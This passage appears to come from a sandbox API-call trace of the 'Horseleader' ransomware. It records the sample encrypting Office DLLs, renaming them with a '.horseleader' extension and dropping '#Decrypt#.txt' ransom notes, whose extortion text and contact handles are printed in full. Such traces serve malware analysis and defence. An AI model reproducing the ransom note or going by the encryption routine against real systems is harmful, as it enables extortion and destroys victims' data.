out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.000] CloseHandle (hObject=0x15c) returned 1 [0245.000] GetProcessHeap () returned 0x780000 [0245.000] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.000] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.horseleader") returned 118 [0245.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.horseleader")) returned 1 [0245.001] GetProcessHeap () returned 0x780000 [0245.001] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.001] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="WordMUI.XML", cAlternateFileName="")) returned 0 [0245.001] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0245.002] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\#Decrypt#.txt") returned 108 [0245.002] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.146] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.146] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0245.147] lstrlenA (lpString="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") returned 1368 [0245.148] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0245.148] CloseHandle (hObject=0x1a4) returned 1 [0245.148] GetProcessHeap () returned 0x780000 [0245.148] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.148] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e501370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e501370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e501370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Word.en-us", cAlternateFileName="WORD~1.EN-")) returned 0 [0245.148] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.149] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\#Decrypt#.txt") returned 97 [0245.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\#Decrypt#.txt" (normalized: "c:\\program files\\common 
files\\microsoft shared\\office14\\office setup controller\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.150] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.150] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.152] lstrlenA (lpString="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") returned 1368 [0245.152] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.152] CloseHandle (hObject=0x158) returned 1 [0245.152] GetProcessHeap () returned 0x780000 [0245.152] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.152] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6bc953f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x2560, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OFFREL.DLL", cAlternateFileName="")) returned 1 [0245.152] lstrcmpiW (lpString1="OFFREL.DLL", lpString2="Windows") returned -1 [0245.152] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 70 [0245.153] StrStrIW (lpFirst="OFFREL.DLL", lpSrch=".horseleader") returned 0x0 [0245.153] lstrcmpW (lpString1="OFFREL.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.153] lstrcmpW (lpString1="OFFREL.DLL", lpString2="_uninstalling_.png") returned 1 [0245.153] lstrlenW (lpString=".testttjffg") returned 11 [0245.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\OFFREL.DLL", lpSrch=".testttjffg") returned 0x0 [0245.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.156] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL") returned 70 [0245.156] StrStrW (lpFirst="OFFREL.DLL", lpSrch=".txt") returned 0x0 [0245.156] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9568) returned 1 [0245.156] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2560, lpOverlapped=0x0) returned 1 [0245.159] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdaa0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.159] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2560, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2560, lpOverlapped=0x0) returned 1 [0245.159] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.159] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.160] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.160] CloseHandle (hObject=0x158) returned 1 [0245.160] GetProcessHeap () returned 0x780000 [0245.160] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.160] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL.horseleader") returned 82 [0245.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OFFREL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\offrel.dll.horseleader")) returned 1 [0245.162] GetProcessHeap () returned 0x780000 [0245.162] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.162] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6c2166d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x4d88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OPHPROXY.DLL", cAlternateFileName="")) returned 1 [0245.162] lstrcmpiW (lpString1="OPHPROXY.DLL", lpString2="Windows") returned -1 [0245.162] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 72 [0245.162] StrStrIW (lpFirst="OPHPROXY.DLL", lpSrch=".horseleader") returned 0x0 [0245.162] lstrcmpW (lpString1="OPHPROXY.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.162] lstrcmpW (lpString1="OPHPROXY.DLL", lpString2="_uninstalling_.png") returned 1 [0245.163] lstrlenW (lpString=".testttjffg") returned 11 [0245.163] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL", lpSrch=".testttjffg") returned 0x0 [0245.163] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.163] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.164] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 72 [0245.164] StrStrW (lpFirst="OPHPROXY.DLL", lpSrch=".txt") returned 0x0 [0245.164] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=19848) returned 1 [0245.164] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4d88, lpOverlapped=0x0) returned 1 [0245.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb278, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.169] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4d88, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4d88, lpOverlapped=0x0) returned 1 [0245.169] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.169] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.170] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.170] CloseHandle (hObject=0x158) returned 1 [0245.170] GetProcessHeap () returned 0x780000 [0245.170] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.170] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL.horseleader") returned 84 [0245.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ophproxy.dll.horseleader")) returned 1 [0245.172] GetProcessHeap () returned 0x780000 [0245.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.172] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a43200, 
ftCreationTime.dwHighDateTime=0x1cb700e, ftLastAccessTime.dwLowDateTime=0xcf47ffa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf6a43200, ftLastWriteTime.dwHighDateTime=0x1cb700e, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OPTINPS.DLL", cAlternateFileName="")) returned 1 [0245.172] lstrcmpiW (lpString1="OPTINPS.DLL", lpString2="Windows") returned -1 [0245.172] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 71 [0245.172] StrStrIW (lpFirst="OPTINPS.DLL", lpSrch=".horseleader") returned 0x0 [0245.172] lstrcmpW (lpString1="OPTINPS.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.172] lstrcmpW (lpString1="OPTINPS.DLL", lpString2="_uninstalling_.png") returned 1 [0245.173] lstrlenW (lpString=".testttjffg") returned 11 [0245.173] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL", lpSrch=".testttjffg") returned 0x0 [0245.173] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.173] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.176] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 71 [0245.177] StrStrW (lpFirst="OPTINPS.DLL", lpSrch=".txt") returned 0x0 [0245.177] GetFileSizeEx (in: 
hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=18336) returned 1 [0245.177] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x47a0, lpOverlapped=0x0) returned 1 [0245.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb860, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.180] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x47a0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x47a0, lpOverlapped=0x0) returned 1 [0245.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.180] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.181] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.181] CloseHandle (hObject=0x158) returned 1 [0245.181] GetProcessHeap () returned 0x780000 [0245.181] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.181] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL.horseleader") returned 83 [0245.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\OPTINPS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll.horseleader")) returned 1 [0245.184] GetProcessHeap () returned 0x780000 [0245.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1570ec00, ftCreationTime.dwHighDateTime=0x1cbc479, ftLastAccessTime.dwLowDateTime=0xe5d21520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1570ec00, ftLastWriteTime.dwHighDateTime=0x1cbc479, nFileSizeHigh=0x0, nFileSizeLow=0xb7ba8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PJ11OD11.DLL", cAlternateFileName="")) returned 1 [0245.184] lstrcmpiW (lpString1="PJ11OD11.DLL", lpString2="Windows") returned -1 [0245.184] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 72 [0245.184] StrStrIW (lpFirst="PJ11OD11.DLL", lpSrch=".horseleader") returned 0x0 [0245.184] lstrcmpW (lpString1="PJ11OD11.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.184] lstrcmpW (lpString1="PJ11OD11.DLL", lpString2="_uninstalling_.png") returned 1 [0245.184] lstrlenW (lpString=".testttjffg") returned 11 [0245.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL", lpSrch=".testttjffg") returned 0x0 [0245.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 72 [0245.186] StrStrW (lpFirst="PJ11OD11.DLL", lpSrch=".txt") returned 0x0 [0245.186] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=752552) returned 1 [0245.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.187] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.190] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x595d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.195] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.195] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
